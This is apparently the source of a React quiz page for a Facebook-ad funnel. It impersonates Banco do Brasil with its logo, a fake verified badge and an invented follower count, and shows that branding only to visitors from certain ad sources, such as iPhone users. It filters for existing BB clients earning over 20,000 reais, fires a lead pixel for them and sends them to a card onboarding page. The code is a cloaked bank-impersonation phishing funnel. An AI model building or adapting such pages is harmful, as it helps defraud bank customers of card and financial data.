import React, { useEffect, useLayoutEffect, useRef, useState } from 'react';
import { useNavigate } from 'react-router-dom';
import './main.css';
import './host.css';

const TOTAL_STEPS = 3;
const NEXT_PAGE = '/onboarding/customer/card';
const BB_PAGE_IMAGE = 'bb-logo-quiz.jpg';

function getPageConfig() {
    const params = new URLSearchParams(window.location.search);
    const utmSource = params.get('utm_source') || localStorage.getItem('utm_source');
    const isIPhone = window.navigator.userAgent.includes('iPhone');
    const isBB2026 = utmSource === 'fb-bb-2026';
    const isLegacyBB = isIPhone && utmSource === 'lead-gen-fb';
    const showVerified = true;

    return {
        isBB2026,
        showVerified,
        pageName: isBB2026 ? 'Banco do Brasil' : isLegacyBB ? 'Banco do Brasil' : 'Expert e Investimentos',
        pageImage: isBB2026 || isLegacyBB ? BB_PAGE_IMAGE : 'e-logo.jpg',
    };
}

const Quiz = function () {
    const navigate = useNavigate();
    const [{ isBB2026, showVerified, pageName, pageImage }] = useState(getPageConfig);
    const [currentStep, setCurrentStep] = useState(1);
    const [goneSteps, setGoneSteps] = useState([]);
    const [answers, setAnswers] = useState({});
    const [qualified, setQualified] = useState(false);
    const leadFired = useRef(false);

    const showBack = currentStep !== 1 && currentStep !== TOTAL_STEPS;

    useLayoutEffect(() => {
        const utmSource = new URLSearchParams(window.location.search).get('utm_source');

        if (utmSource) {
            localStorage.setItem('utm_source', utmSource);
        }

        document.documentElement.classList.add('quiz-mode');
        document.body.classList.add('quiz-mode');

        return () => {
            document.documentElement.classList.remove('quiz-mode');
            document.body.classList.remove('quiz-mode');
        };
    }, []);

    useEffect(() => {
        if (currentStep !== TOTAL_STEPS || !qualified) return;

        const timer = setTimeout(() => navigate(NEXT_PAGE), 1500);

        return () => clearTimeout(timer);
    }, [currentStep, qualified, navigate]);

    function fireLead() {
        if (leadFired.current) return;

        leadFired.current = true;

        if (typeof window.fbq === 'function') {
            window.fbq('track', 'Lead');
        }
    }

    function selectAnswer(value) {
        console.log(value);

        if (value === 'a20k' && isBB2026) {
            fireLead();
        }

        const nextAnswers = { ...answers, [currentStep]: value };
        const nextStep = currentStep + 1;

        setAnswers(nextAnswers);
        setGoneSteps((steps) => [...steps, currentStep]);
        setCurrentStep(nextStep);

        if (nextStep === TOTAL_STEPS) {
            const isQualified = isBB2026 && nextAnswers[1] === 'a20k' && nextAnswers[2] === 'sim';

            setQualified(isQualified);

            if (isQualified) {
                fireLead();
            }
        }
    }

    function goBack() {
        if (currentStep === 1) return;

        const previousStep = currentStep - 1;
        setGoneSteps((steps) => steps.filter((step) => step !== previousStep));
        setCurrentStep(previousStep);
    }

    function closeWindow() {
        window.close();
    }

    return (
        <div className="pool-page">
            <div className="header-menu">
                <div className="menu container">
                    <img
                        src="/assets/img/icons/btn-voltar.svg"
                        className={`back-btn ${showBack ? '' : 'hidden'}`}
                        width="10"
                        alt="Voltar"
                        onClick={goBack}
                    />
                    <div></div>
                    <div className="fechar-janela pointer" onClick={closeWindow}>Fechar</div>
                </div>
            </div>

            <div id="q-1" className={`q-layout ${goneSteps.includes(1) ? 'go-left' : ''}`}>
                <div className="header-steps three-steps">
                    <div></div>
                </div>
                <div className="flex flex-col container">
                    <div className="flex flex-col flex-1 justify-center items-center fb-page-logo">
                        <img src={`/assets/img/${pageImage}`} className="fb-page-img full-rounded" alt="" />
                        <div className="flex justify-center gap-1 mt-4">
                            <p className="fb-page-title">{pageName}</p>
                            {showVerified && <img src="/assets/img/icons/verified-badge.svg" alt="" />}
                        </div>
                        {showVerified && <p className="followers">4 mi seguidores</p>}
                    </div>
                    <p className="text-center mt-8 pool-title">Qual é a sua faixa de renda mensal?</p>
                    <div className="flex flex-col gap-y-3 mt-8">
                        <div className="pool-container" data-val="u5k" onClick={() => selectAnswer('u5k')}>Até 5 mil reais</div>
                        <div className="pool-container" data-val="5t10k" onClick={() => selectAnswer('5t10k')}>De 5 a 10 mil reais</div>
                        <div className="pool-container" data-val="10t20k" onClick={() => selectAnswer('10t20k')}>De 10 mil a 20 mil reais</div>
                        <div className="pool-container" data-val="a20k" onClick={() => selectAnswer('a20k')}>Acima de 20 mil reais</div>
                    </div>
                </div>
            </div>

            <div id="q-2" className={`q-layout ${goneSteps.includes(2) ? 'go-left' : ''}`}>
                <div className="header-steps three-steps">
                    <div></div>
                    <div></div>
                </div>
                <div className="flex flex-col container">
                    <div className="flex flex-col flex-1 justify-center items-center fb-page-logo">
                        <img src={`/assets/img/${pageImage}`} className="fb-page-img full-rounded" alt="" />
                        <div className="flex justify-center gap-1 mt-4">
                            <p className="fb-page-title">{pageName}</p>
                            {showVerified && <img src="/assets/img/icons/verified-badge.svg" alt="" />}
                        </div>
                        {showVerified && <p className="followers">4 mi seguidores</p>}
                    </div>
                    <p className="text-center mt-8 pool-title">Você já é correntista BB?</p>
                    <div className="flex flex-col gap-y-3 mt-8">
                        <div className="pool-container" data-val="sim" onClick={() => selectAnswer('sim')}>Sim</div>
                        <div className="pool-container" data-val="nao" onClick={() => selectAnswer('nao')}>Não</div>
                    </div>
                </div>
            </div>

            <div id="q-3" className={`q-layout ${goneSteps.includes(3) ? 'go-left' : ''}`}>
                <div className="header-steps three-steps">
                    <div></div>
                    <div></div>
                    <div></div>
                </div>
                <div className="flex flex-col container">
                    <div className="flex flex-col flex-1 justify-center items-center fb-page-success">
                        <img src="/assets/img/success.png" className="fb-page-success-img" alt="" />
                    </div>
                    <p className="text-center mt-6 success-title">Pronto.</p>
                    <p className="text-center followers mt-3">
                        Suas informações foram enviadas para a Página {pageName}.
                    </p>
                </div>
            </div>
        </div>
    );
};

export default Quiz;
